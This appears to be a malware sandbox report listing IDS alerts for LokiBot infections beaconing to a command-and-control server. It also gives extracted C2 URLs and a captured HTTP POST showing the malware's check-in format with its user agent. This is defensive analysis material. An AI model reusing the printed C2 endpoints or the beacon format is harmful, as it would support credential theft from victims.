            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49793 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49789 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49789 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49789 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49737
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49791 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49791 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49791 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49793 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49789 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49791 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49792 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49792 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49780 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49780 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49780 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49746 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49746 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49746 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49787 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49787 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49787 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49774
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49746 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49792 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49787 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49715 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49780 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49740
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49792 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49758 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49758 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49758 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49769 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49769 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49769 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49769 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49745
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49736 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49789
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49791
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49793
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49741 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49717
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49716
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49758 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49794 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49794 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49794 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49776 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49776 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49733 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49776 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49714 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49794 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49776 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49762 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49762 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49762 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49787
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49762 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49742
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49744 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49735 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49759
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49794
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49747 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49765
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49747 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49747 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49746
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49766 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49747 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49788 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49788 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49788 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49780
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49788 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49719
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49779 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49763 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49763 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49779 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49779 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49763 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49760
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49779 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49763 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49766 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49766 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49769
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49766 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49741
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49762
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49779
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49775 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49775 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49763
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49775 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49775 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49776
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49778 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49778 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49768 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49778 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49768 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49768 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49778 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49768 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49786 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49786 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49786 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49786 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49770 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49770 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49770 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49770 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49735
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49772 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49772 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49775
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49772 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49772 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49781
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49772
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49771
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49768
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49782 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49782 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49782 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49782 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49785 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49785 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49785 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49795 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49795 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49795 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49795 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49785 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49782
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49783 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49783 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49783 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49783 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49777 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49777 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49777 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49777 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49777
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 180Connection: close
